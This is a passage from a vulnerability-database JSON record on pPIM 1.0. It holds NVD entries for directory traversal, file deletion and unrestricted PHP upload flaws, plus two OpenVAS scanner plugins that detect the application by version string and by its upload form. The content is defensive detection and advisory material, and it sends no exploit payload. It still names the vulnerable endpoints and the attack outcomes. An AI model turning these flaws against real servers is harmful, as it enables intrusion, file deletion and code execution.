(dot dot) in the id parameter in an edit action.", "edition": 4, "cvss3": {}, "published": "2008-10-09T18:14:00", "title": "CVE-2008-4528", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-4528"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:phlatline:personal_information_manager:1.01"], "id": "CVE-2008-4528", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4528", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phlatline:personal_information_manager:1.01:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:17", "description": "Directory traversal vulnerability in upload.php in Phlatline's Personal Information Manager (pPIM) 1.0 allows remote attackers to delete arbitrary files via directory traversal sequences in the file parameter within a delfile action.", "edition": 4, "cvss3": {}, "published": "2008-10-03T22:22:00", "title": "CVE-2008-4425", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 9.2, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-4425"], 
"modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:phlatline:personal_information_manager:1.0"], "id": "CVE-2008-4425", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4425", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}, "cpe23": ["cpe:2.3:a:phlatline:personal_information_manager:1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:17", "description": "Unrestricted file upload vulnerability in upload.php in Phlatline's Personal Information Manager (pPIM) 1.0 and earlier allows remote attackers to execute arbitrary code by uploading a .php file, then accessing it via a direct request to the file in the top-level directory.", "edition": 6, "cvss3": {}, "published": "2008-10-03T22:22:00", "title": "CVE-2008-4428", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-4428"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:phlatline:personal_information_manager:1.0"], "id": "CVE-2008-4428", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4428", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:phlatline:personal_information_manager:1.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-05-08T19:12:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4425"], "description": "This host is running pPIM which is prone to multiple vulnerabilities, including two security-bypass\n issues, a cross-site scripting issue, and a file-upload issue.", "modified": "2020-05-06T00:00:00", 
"published": "2009-03-02T00:00:00", "id": "OPENVAS:1361412562310100005", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100005", "type": "openvas", "title": "pPIM Multiple Remote Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# pPIM Multiple Remote Vulnerabilities\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (C) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100005\");\n script_version(\"2020-05-06T08:50:57+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 08:50:57 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-03-02 16:07:07 +0100 (Mon, 02 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"8.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:C/A:C\");\n script_cve_id(\"CVE-2008-4425\");\n script_bugtraq_id(30627);\n script_name(\"pPIM Multiple Remote Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", 
\"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"http://www.phlatline.org/index.php?page=prod-ppim\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/30627\");\n\n script_tag(name:\"summary\", value:\"This host is running pPIM which is prone to multiple vulnerabilities, including two security-bypass\n issues, a cross-site scripting issue, and a file-upload issue.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit these issues to:\n\n - execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site\n\n - steal cookie-based authentication credentials\n\n - delete local files within the context of the webserver process\n\n - upload arbitrary PHP scripts and execute them in the context of the webserver\n\n - change user passwords\");\n\n script_tag(name:\"affected\", value:\"These issues affect pPIM 1.0 and prior versions.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. 
General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"version_func.inc\");\n\nport = http_get_port(default:80);\nif(!http_can_host_php(port:port)) exit(0);\n\nforeach dir( make_list_unique( \"/ppim\", http_cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = string(dir, \"/Readme.txt\");\n buf = http_get_cache(item:url, port:port);\n\n if( \"pPIM\" >< buf ) {\n ver = eregmatch(string: buf, pattern: \"Version ([0-9\\.0-9]+)\");\n if ( !isnull(ver[1]) ) {\n version = int( str_replace(find: '.', string: ver[1], replace: \"\") );\n if( version > 0 && version <= 10 ) {\n report = report_fixed_ver( installed_version:version, fixed_version:\"None\");\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n } else {\n # perhaps user has removed Readme.txt\n url = string(dir, \"/upload.php\");\n buf = http_get_cache(item:url, port:port);\n if(!buf) continue;\n\n if( egrep(pattern: \"Location:.login\\.php\\?login=1\", string: buf) ) {\n\n url = string(dir, \"/upload.php?login=1\");\n req = http_get(item:url, port:port);\n buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\n if(!buf) continue;\n\n if( egrep(pattern: 'NAME=\"userfile\"', string: buf ) &&\n egrep(pattern: 'name=\"submitupload\"', string: buf) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n #user installed ppim without password protection#\n else if( egrep(pattern: 'NAME=\"userfile\"', string: buf ) &&\n egrep(pattern: 'name=\"submitupload\"', string: buf) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n 
}\n}\n\nexit( 99 );\n", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2017-09-19T12:03:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4425"], "description": "This host is running pPIM. pPIM is an information manager that can hold contacts, events in a\n calendar, links, send emails, check email, store notes, and upload files.\n\n pPIM is prone to multiple vulnerabilities, including two security-bypass\n issues, a cross-site scripting issue, and a file-upload issue.\n\n Attackers can exploit these issues to:\n\n - execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site\n - steal cookie-based authentication credentials\n - delete local files within the context of the webserver process\n - upload arbitrary PHP scripts and execute them in the context of the webserver\n - change user passwords\n\n These issues affect pPIM 1.0 and prior versions.\n\n See http://www.phlatline.org/index.php?page=prod-ppim and http://www.securityfocus.com/bid/30627\n for further information.", "modified": "2017-09-18T00:00:00", "published": "2009-03-02T00:00:00", "id": "OPENVAS:100005", "href": "http://plugins.openvas.org/nasl.php?oid=100005", "type": "openvas", "title": "pPIM Multiple Remote Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: pPIM_multiple_remote_vulnerabilities.nasl 7170 2017-09-18 10:35:33Z cfischer $\n#\n# pPIM Multiple Remote Vulnerabilities\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"This host is running pPIM. pPIM is an information manager that can hold contacts, events in a\n calendar, links, send emails, check email, store notes, and upload files.\n\n pPIM is prone to multiple vulnerabilities, including two security-bypass\n issues, a cross-site scripting issue, and a file-upload issue.\n\n Attackers can exploit these issues to:\n\n - execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site\n - steal cookie-based authentication credentials\n - delete local files within the context of the webserver process\n - upload arbitrary PHP scripts and execute them in the context of the webserver\n - change user passwords\n\n These issues affect pPIM 1.0 and prior versions.\n\n See http://www.phlatline.org/index.php?page=prod-ppim and http://www.securityfocus.com/bid/30627\n for further information.\";\n\ntag_solution = \"Uninstall pPIM.\";\n\nif (description)\n{\n script_id(100005);\n script_version(\"$Revision: 7170 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-09-18 12:35:33 +0200 (Mon, 18 Sep 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-02 16:07:07 +0100 (Mon, 02 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"8.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:C/A:C\");\n script_cve_id(\"CVE-2008-4425\");\n script_bugtraq_id(30627);\n script_name(\"pPIM Multiple Remote Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"Web application 
abuses\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\nif(!can_host_php(port:port)) exit(0);\n\nforeach dir( make_list_unique( \"/ppim\", cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = string(dir, \"/Readme.txt\");\n buf = http_get_cache(item:url, port:port);\n \n if( \"pPIM\" >< buf ) {\n ver = eregmatch(string: buf, pattern: \"Version ([0-9\\.0-9]+)\");\n if ( !isnull(ver[1]) ) {\n version = int( str_replace(find: '.', string: ver[1], replace: \"\") );\n if( version > 0 && version <= 10 ) {\n security_message( port:port );\n\texit( 0 );\n }\n }\n } else {\n # perhaps user has removed Readme.txt\n url = string(dir, \"/upload.php\");\n buf = http_get_cache(item:url, port:port);\n if( buf == NULL )continue;\n\n if( egrep(pattern: \"Location:.login\\.php\\?login=1\", string: buf) ) {\n\n url = string(dir, \"/upload.php?login=1\");\n req = http_get(item:url, port:port);\n buf = http_keepalive_send_recv(port:port, data:req, bodyonly:0);\n if( buf == NULL )continue;\n\n if( egrep(pattern: 'NAME=\"userfile\"', string: buf ) &&\n egrep(pattern: 'name=\"submitupload\"', string: buf) ) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n #user installed ppim without password protection#\n else if( egrep(pattern: 'NAME=\"userfile\"', string: buf ) &&\n egrep(pattern: 'name=\"submitupload\"', string: buf) ) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n } \n } \n}\n\nexit( 99 );\n", 
"cvss": {"score": 8.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:COMPLETE/A:COMPLETE/"}}]}